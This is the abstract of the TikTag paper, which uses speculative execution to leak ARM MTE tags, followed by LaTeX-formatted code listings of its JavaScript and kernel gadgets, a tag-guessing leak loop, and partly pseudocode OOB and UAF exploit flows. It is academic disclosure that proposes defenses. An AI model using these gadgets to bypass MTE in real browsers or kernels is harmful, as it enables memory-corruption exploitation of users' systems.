TikTag: Breaking ARM's Memory Tagging Extension with Speculative Execution

ARM Memory Tagging Extension (MTE) is a new hardware feature introduced in ARMv8.5-A architecture, aiming to detect memory corruption vulnerabilities. The low overhead of MTE makes it an attractive solution to mitigate memory corruption attacks in modern software systems and is considered the most promising path forward for improving C/C++ software security. This paper explores the potential security risks posed by speculative execution attacks against MTE. Specifically, this paper identifies new TikTag gadgets capable of leaking the MTE tags from arbitrary memory addresses through speculative execution. With TikTag gadgets, attackers can bypass the probabilistic defense of MTE, increasing the attack success rate by close to 100%. We demonstrate that TikTag gadgets can be used to bypass MTE-based mitigations in real-world systems, Google Chrome and the Linux kernel. Experimental results show that TikTag gadgets can successfully leak an MTE tag with a success rate higher than 95% in less than 4 seconds. We further propose new defense mechanisms to mitigate the security risks posed by TikTag gadgets.

==> code/g2-js.asm.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{c+c1}{;; \PYZhy{}\PYZhy{}\PYZhy{} Optimized code \PYZhy{}\PYZhy{}\PYZhy{}}
\PY{c+c1}{;; optimization\PYZus{}id = 0}
\PY{c+c1}{;; kind = TURBOFAN}
\PY{c+c1}{;; name = TikTag\PYZus{}v2}
\PY{c+c1}{;; stack\PYZus{}slots = 6}
\PY{c+c1}{;; compiler = turbofan}

\PY{c+c1}{;; BR}
\PY{n+nf}{ldrb}\PY{+w}{ }\PY{n+nv}{w2}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x2}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; x2 == \PYZam{}slow[0]}
\PY{n+nf}{cbnz}\PY{+w}{ }\PY{n+nv}{w2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{o}{+}\PY{l+m+mh}{0x64}

\PY{n+nf}{add}\PY{+w}{ }\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x28}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x2}\PY{+w}{ }\PY{c+c1}{;; x2 == victim}
\PY{n+nf}{ldur}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{35}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; victim.raw\PYZus{}length}
\PY{n+nf}{lsr}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{29}
\PY{n+nf}{ldur}\PY{+w}{ }\PY{n+nv}{w4}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{51}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; victim.base\PYZus{}pointer}
\PY{n+nf}{ldur}\PY{+w}{ }\PY{n+nv}{x5}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{43}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; victim.external\PYZus{}pointer}
\PY{n+nf}{add}\PY{+w}{ }\PY{n+nv}{x5}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x28}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x5}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{lsr}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{27}
\PY{n+nf}{fcvtzs}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{d0}\PY{+w}{ }\PY{c+c1}{;; d0 == idx}
\PY{n+nf}{cmn}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mh}{0x1}\PY{+w}{ }\PY{p}{(}\PY{l+m+mi}{1}\PY{p}{)}
\PY{n+nf}{cinc}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{vs}
\PY{n+nf}{scvtf}\PY{+w}{ }\PY{n+nv}{d1}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x6}
\PY{n+nf}{fcmp}\PY{+w}{ }\PY{n+nv}{d1}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{d0}\PY{+w}{ }\PY{c+c1}{;; check if idx is an integer}
\PY{n+nf}{b.ne}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{o}{+}\PY{l+m+mh}{0x198}
\PY{n+nf}{cmp}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x3}\PY{+w}{ }\PY{c+c1}{;; check if idx is in bounds}
\PY{n+nf}{b.hs}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{o}{+}\PY{l+m+mh}{0x194}

\PY{c+c1}{;; CHECK}
\PY{n+nf}{mov}\PY{+w}{ }\PY{n+nv}{w3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{w4}
\PY{n+nf}{add}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x5}
\PY{n+nf}{movz}\PY{+w}{ }\PY{n+nv}{x7}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mh}{0x40}\PY{+w}{ }\PY{c+c1}{;; PROBE\PYZus{}OFFSET}
\PY{n+nf}{str}\PY{+w}{ }\PY{n+nv}{w7}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{lsl}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{2}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; store}
\PY{n+nf}{mov}\PY{+w}{ }\PY{n+nv}{w3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{w4}
\PY{n+nf}{add}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x5}
\PY{n+nf}{ldr}\PY{+w}{ }\PY{n+nv}{w3}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x3}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x6}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{lsl}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{2}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; load}

\PY{c+c1}{;; TEST}
\PY{n+nf}{movz}\PY{+w}{ }\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mh}{0x400}
\PY{n+nf}{movk}\PY{+w}{ }\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mh}{0x39}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{lsl}\PY{+w}{ }\PY{err}{\PYZsh{}}\PY{l+m+mi}{32}
\PY{n+nf}{ldrb}\PY{+w}{ }\PY{n+nv}{w2}\PY{p}{,}\PY{+w}{ }\PY{p}{[}\PY{n+nv}{x2}\PY{p}{,}\PY{+w}{ }\PY{n+nv}{x3}\PY{p}{]}\PY{+w}{ }\PY{c+c1}{;; x2 == probe}
\end{Verbatim}


==> code/g2-js.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{k+kt}{int}\PY{+w}{ }\PY{n+nf}{TikTag\PYZus{}v2}\PY{p}{(}\PY{k+kt}{double}\PY{+w}{ }\PY{n}{idx}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{c+c1}{// BR}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{o}{!}\PY{n}{slow}\PY{p}{[}\PY{l+m+mi}{0}\PY{p}{]}\PY{p}{)}
\PY{+w}{        }\PY{k}{return}\PY{+w}{ }\PY{l+m+mi}{0}\PY{p}{;}
\PY{+w}{    }
\PY{+w}{    }\PY{c+c1}{// CHECK}
\PY{+w}{    }\PY{c+c1}{// victim bound check}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n}{idx}\PY{+w}{ }\PY{o}{\PYZlt{}}\PY{+w}{ }\PY{l+m+mi}{0}\PY{+w}{ }\PY{o}{|}\PY{o}{|}\PY{+w}{ }\PY{p}{(}\PY{k+kt}{uint64\PYZus{}t}\PY{p}{)}\PY{n}{idx}\PY{+w}{ }\PY{o}{\PYZgt{}}\PY{+w}{ }\PY{n}{victim}\PY{p}{.}\PY{n}{length}\PY{p}{)}
\PY{+w}{        }\PY{k}{return}\PY{+w}{ }\PY{n}{undefined}\PY{p}{;}
\PY{+w}{    }\PY{n}{victim}\PY{p}{.}\PY{n}{buffer}\PY{p}{[}\PY{n}{idx}\PY{p}{]}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{PROBE\PYZus{}OFFSET}\PY{p}{;}\PY{+w}{ }\PY{c+c1}{// store}
\PY{+w}{    }\PY{k+kt}{double}\PY{+w}{ }\PY{n}{val}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{victim}\PY{p}{.}\PY{n}{buffer}\PY{p}{[}\PY{n}{idx}\PY{p}{]}\PY{p}{;}\PY{+w}{ }\PY{c+c1}{// load}

\PY{+w}{    }\PY{c+c1}{// TEST}
\PY{+w}{    }\PY{c+c1}{// probe bound check}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n}{val}\PY{+w}{ }\PY{o}{\PYZlt{}}\PY{+w}{ }\PY{l+m+mi}{0}\PY{+w}{ }\PY{o}{|}\PY{o}{|}\PY{+w}{ }\PY{n}{val}\PY{+w}{ }\PY{o}{\PYZgt{}}\PY{o}{=}\PY{+w}{ }\PY{n}{probe}\PY{p}{.}\PY{n}{length}\PY{p}{)}
\PY{+w}{        }\PY{k}{return}\PY{+w}{ }\PY{n}{undefined}\PY{p}{;}
\PY{+w}{    }\PY{k}{return}\PY{+w}{ }\PY{n}{probe}\PY{p}{.}\PY{n}{buffer}\PY{p}{[}\PY{n}{val}\PY{p}{]}\PY{p}{;}
\PY{p}{\PYZcb{}}
\end{Verbatim}


==> code/g2.js.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{n+nx}{slow}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{o+ow}{new}\PY{+w}{ }\PY{n+nb}{Uint8Array}\PY{p}{(}\PY{l+m+mf}{64}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{victim}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{o+ow}{new}\PY{+w}{ }\PY{n+nb}{Float64Array}\PY{p}{(}\PY{l+m+mf}{64}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{probe}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{o+ow}{new}\PY{+w}{ }\PY{n+nb}{Uint8Array}\PY{p}{(}\PY{l+m+mf}{512}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{PROBE\PYZus{}OFFSET}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{l+m+mf}{0}\PY{p}{;}

\PY{k+kd}{function}\PY{+w}{ }\PY{n+nx}{TikTag\PYZus{}v2}\PY{p}{(}\PY{n+nx}{idx}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{c+c1}{// BR}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{o}{!}\PY{n+nx}{slow}\PY{p}{[}\PY{l+m+mf}{0}\PY{p}{]}\PY{p}{)}\PY{+w}{ }\PY{c+c1}{// cond\PYZus{}ptr}
\PY{+w}{        }\PY{k}{return}\PY{+w}{ }\PY{l+m+mf}{0}\PY{p}{;}

\PY{+w}{    }\PY{c+c1}{// CHECK}
\PY{+w}{    }\PY{n+nx}{victim}\PY{p}{[}\PY{n+nx}{idx}\PY{p}{]}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{PROBE\PYZus{}OFFSET}\PY{p}{;}\PY{+w}{ }\PY{c+c1}{// store to guess\PYZus{}ptr}
\PY{+w}{    }\PY{n+nx}{val}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{victim}\PY{p}{[}\PY{n+nx}{idx}\PY{p}{]}\PY{p}{;}\PY{+w}{          }\PY{c+c1}{// load from guess\PYZus{}ptr}
\PY{+w}{    }\PY{c+c1}{// TEST}
\PY{+w}{    }\PY{c+c1}{// if Tg == Tm, probe[PROBE\PYZus{}OFFSET] is cached}
\PY{+w}{    }\PY{c+c1}{// if Tg != Tm, probe[PROBE\PYZus{}OFFSET] is not cached}
\PY{+w}{    }\PY{k}{return}\PY{+w}{ }\PY{n+nx}{probe}\PY{p}{[}\PY{n+nx}{val}\PY{p}{]}\PY{p}{;}
\PY{p}{\PYZcb{}}
\end{Verbatim}


==> code/kernel-oob.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{k+kt}{char}\PY{+w}{ }\PY{n}{ubuf}\PY{p}{[}\PY{l+m+mh}{0x1000}\PY{p}{]}\PY{p}{;}
\PY{n}{obj\PYZus{}vuln}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocVuln}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{n}{obj\PYZus{}targ}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{n}{oob\PYZus{}offset}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{GetOffset}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{,}\PY{+w}{ }\PY{n}{obj\PYZus{}targ}\PY{p}{)}\PY{p}{;}

\PY{k}{while}\PY{+w}{ }\PY{p}{(}\PY{l+m+mi}{1}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{n}{SysTikTagOOB}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{,}\PY{+w}{ }\PY{n}{oob\PYZus{}offset}\PY{p}{,}\PY{+w}{ }\PY{n}{ubuf}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n}{Measure}\PY{p}{(}\PY{n}{ubuf}\PY{p}{)}\PY{+w}{ }\PY{o}{=}\PY{o}{=}\PY{+w}{ }\PY{n}{TAG\PYZus{}MATCH}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{        }\PY{k}{break}\PY{p}{;}
\PY{+w}{    }\PY{p}{\PYZcb{}}
\PY{+w}{    }\PY{n}{SysFreeTarget}\PY{p}{(}\PY{n}{obj\PYZus{}target}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{n}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{p}{\PYZcb{}}

\PY{c+c1}{// Now obj\PYZus{}vuln.tag == obj\PYZus{}target.tag}
\PY{n}{SysExploitOOB}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{,}\PY{+w}{ }\PY{n}{oob\PYZus{}offset}\PY{p}{)}\PY{p}{;}\PY{+w}{ }\PY{c+c1}{// corrupt obj\PYZus{}target}
\end{Verbatim}


==> code/kernel-uaf.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{k+kt}{char}\PY{+w}{ }\PY{n}{ubuf}\PY{p}{[}\PY{l+m+mh}{0x1000}\PY{p}{]}\PY{p}{;}
\PY{n}{obj\PYZus{}vuln}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocVuln}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{n}{SysFreeVuln}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}
\PY{n}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{c+c1}{// obj\PYZus{}vuln.addr == obj\PYZus{}target.addr}

\PY{k}{while}\PY{+w}{ }\PY{p}{(}\PY{l+m+mi}{1}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{n}{SysTikTagUAF}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{,}\PY{+w}{ }\PY{n}{ubuf}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n}{Measure}\PY{p}{(}\PY{n}{ubuf}\PY{p}{)}\PY{+w}{ }\PY{o}{=}\PY{o}{=}\PY{+w}{ }\PY{n}{TAG\PYZus{}MISMATCH}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{        }\PY{k}{break}\PY{p}{;}
\PY{+w}{    }\PY{p}{\PYZcb{}}
\PY{+w}{    }\PY{n}{SysFreeTarget}\PY{p}{(}\PY{n}{obj\PYZus{}target}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{n}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{SysAllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{p}{\PYZcb{}}

\PY{c+c1}{// Now obj\PYZus{}vuln.tag == obj\PYZus{}target.tag}
\PY{n}{SysExploitUAF}\PY{p}{(}\PY{n}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}\PY{+w}{ }\PY{c+c1}{// corrupt obj\PYZus{}taret}
\end{Verbatim}


==> code/oob.js.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{n+nx}{obj\PYZus{}vuln}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocVuln}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{c+c1}{// obj\PYZus{}vuln.addr + offset}
\PY{c+c1}{//      = obj\PYZus{}target.addr }
\PY{n+nx}{idxA}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{ObjToIdx}\PY{p}{(}\PY{n+nx}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{idxB}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{ObjToIdx}\PY{p}{(}\PY{n+nx}{obj\PYZus{}target}\PY{p}{)}\PY{p}{;}

\PY{n+nx}{tagA}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idxA}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{tagB}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idxB}\PY{p}{)}\PY{p}{;}

\PY{k}{while}\PY{+w}{ }\PY{p}{(}\PY{n+nx}{tagA}\PY{+w}{ }\PY{o}{!=}\PY{+w}{ }\PY{n+nx}{tagB}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{n+nx}{Free}\PY{p}{(}\PY{n+nx}{obj\PYZus{}target}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{n+nx}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}\PY{+w}{ }
\PY{+w}{    }\PY{n+nx}{tagB}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idxB}\PY{p}{)}\PY{p}{;}
\PY{p}{\PYZcb{}}
\PY{c+c1}{// tagA == tagB}
\PY{c+c1}{// corrupt obj\PYZus{}target}
\PY{n+nx}{ExploitOOB}\PY{p}{(}\PY{n+nx}{obj\PYZus{}vuln}\PY{p}{,}\PY{+w}{ }\PY{n+nx}{offset}\PY{p}{)}\PY{p}{;}\PY{+w}{ }
\end{Verbatim}


==> code/snd-timer.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{k}{static}\PY{+w}{ }\PY{k+kt}{ssize\PYZus{}t}\PY{+w}{ }\PY{n+nf}{snd\PYZus{}timer\PYZus{}user\PYZus{}read}\PY{p}{(}\PY{k}{struct}\PY{+w}{ }\PY{n+nc}{file}\PY{+w}{ }\PY{o}{*}\PY{n}{file}\PY{p}{,}\PY{+w}{ }
\PY{+w}{    }\PY{k+kt}{char}\PY{+w}{ }\PY{n}{\PYZus{}\PYZus{}user}\PY{+w}{ }\PY{o}{*}\PY{n}{buffer}\PY{p}{,}\PY{+w}{ }\PY{k+kt}{size\PYZus{}t}\PY{+w}{ }\PY{n}{count}\PY{p}{,}\PY{+w}{ }\PY{n}{loff\PYZus{}t}\PY{+w}{ }\PY{o}{*}\PY{n}{offset}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{p}{.}\PY{p}{.}\PY{p}{.}
\PY{+w}{    }\PY{k}{switch}\PY{+w}{ }\PY{p}{(}\PY{n}{tu}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{tread}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{k}{default}\PY{o}{:}
\PY{o}{\PYZhy{}}\PY{+w}{       }\PY{k}{return}\PY{+w}{ }\PY{o}{\PYZhy{}}\PY{n}{ENOTSUPP}\PY{p}{;}
\PY{o}{+}\PY{+w}{       }\PY{k}{break}\PY{p}{;}
\PY{+w}{    }\PY{p}{\PYZcb{}}
\PY{+w}{    }\PY{c+c1}{// BR: speculation branch with cond\PYZus{}ptr (tu) }
\PY{+w}{    }\PY{k}{switch}\PY{+w}{ }\PY{p}{(}\PY{n}{tu}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{tread}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{     }\PY{k}{case}\PY{+w}{ }\PY{n+no}{TREAD\PYZus{}FORMAT\PYZus{}TIME32}\PY{p}{:}\PY{+w}{ }\PY{c+c1}{// branch prediction destination}
\PY{+w}{        }\PY{c+c1}{// CHECK: dereference guess\PYZus{}ptr (tread) with 4 loads}
\PY{+w}{        }\PY{n}{tread32}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{p}{(}\PY{k}{struct}\PY{+w}{ }\PY{n+nc}{snd\PYZus{}timer\PYZus{}tread32}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{             }\PY{p}{.}\PY{n}{event}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{tread}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{event}\PY{p}{,}\PY{+w}{ }
\PY{+w}{             }\PY{p}{.}\PY{n}{tstamp\PYZus{}sec}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{tread}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{tstamp\PYZus{}sec}\PY{p}{,}
\PY{+w}{             }\PY{p}{.}\PY{n}{tstamp\PYZus{}nsec}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{tread}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{tstamp\PYZus{}nsec}\PY{p}{,}
\PY{+w}{             }\PY{p}{.}\PY{n}{val}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n}{tread}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{val}\PY{p}{,}
\PY{+w}{         }\PY{p}{\PYZcb{}}\PY{p}{;}
\PY{+w}{       }\PY{c+c1}{// TEST: dereference test\PYZus{}ptr (buffer)}
\PY{+w}{       }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n}{copy\PYZus{}to\PYZus{}user}\PY{p}{(}\PY{n}{buffer}\PY{p}{,}\PY{+w}{ }\PY{o}{\PYZam{}}\PY{n}{tread32}\PY{p}{,}\PY{+w}{ }\PY{k}{sizeof}\PY{p}{(}\PY{n}{tread32}\PY{p}{)}\PY{p}{)}\PY{p}{)}\PY{+w}{  }
\PY{+w}{             }\PY{n}{err}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{o}{\PYZhy{}}\PY{n}{EFAULT}\PY{p}{;}
\PY{+w}{         }\PY{k}{break}\PY{p}{;}
\PY{+w}{    }\PY{k}{default}\PY{o}{:}\PY{+w}{ }\PY{c+c1}{// correct branch destination}
\PY{+w}{         }\PY{n}{err}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{o}{\PYZhy{}}\PY{n}{ENOTSUPP}\PY{p}{;}
\PY{+w}{         }\PY{k}{break}\PY{p}{;}
\PY{+w}{    }\PY{p}{\PYZcb{}}
\PY{+w}{ }\PY{p}{\PYZcb{}}
\end{Verbatim}


==> code/tiktagleak.js.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{k+kd}{function}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idx}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{k}{for}\PY{+w}{ }\PY{p}{(}\PY{n+nx}{Tg}\PY{o}{=}\PY{l+m+mh}{0x0}\PY{p}{;}\PY{+w}{ }\PY{n+nx}{Tg}\PY{o}{\PYZlt{}=}\PY{l+m+mh}{0xf}\PY{p}{;}\PY{+w}{ }\PY{n+nx}{Tg}\PY{o}{++}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{        }\PY{n+nx}{res}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTag\PYZus{}v2}\PY{p}{(}\PY{n+nx}{idx}\PY{+w}{ }\PY{o}{|}\PY{+w}{ }\PY{p}{(}\PY{n+nx}{Tg}\PY{o}{\PYZlt{}\PYZlt{}}\PY{l+m+mf}{56}\PY{p}{)}\PY{o}{/}\PY{l+m+mf}{8}\PY{p}{)}\PY{p}{;}
\PY{+w}{        }\PY{k}{if}\PY{+w}{ }\PY{p}{(}\PY{n+nx}{res}\PY{+w}{ }\PY{o}{==}\PY{+w}{ }\PY{n+nx}{TAG\PYZus{}MATCH}\PY{p}{)}
\PY{+w}{            }\PY{k}{return}\PY{+w}{ }\PY{n+nx}{Tg}\PY{p}{;}
\PY{+w}{    }\PY{p}{\PYZcb{}}
\PY{+w}{    }\PY{k}{return}\PY{+w}{ }\PY{o}{\PYZhy{}}\PY{l+m+mf}{1}\PY{p}{;}
\PY{p}{\PYZcb{}}
\end{Verbatim}


==> code/uaf.js.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8\relax}]
\PY{n+nx}{obj\PYZus{}vuln}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocVuln}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{idx}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{ObjToIdx}\PY{p}{(}\PY{n+nx}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{tagA}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idx}\PY{p}{)}\PY{p}{;}\PY{+w}{ }

\PY{n+nx}{Free}\PY{p}{(}\PY{n+nx}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}
\PY{n+nx}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{c+c1}{// obj\PYZus{}vuln.addr == obj\PYZus{}target.addr}
\PY{n+nx}{tagB}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idx}\PY{p}{)}\PY{p}{;}

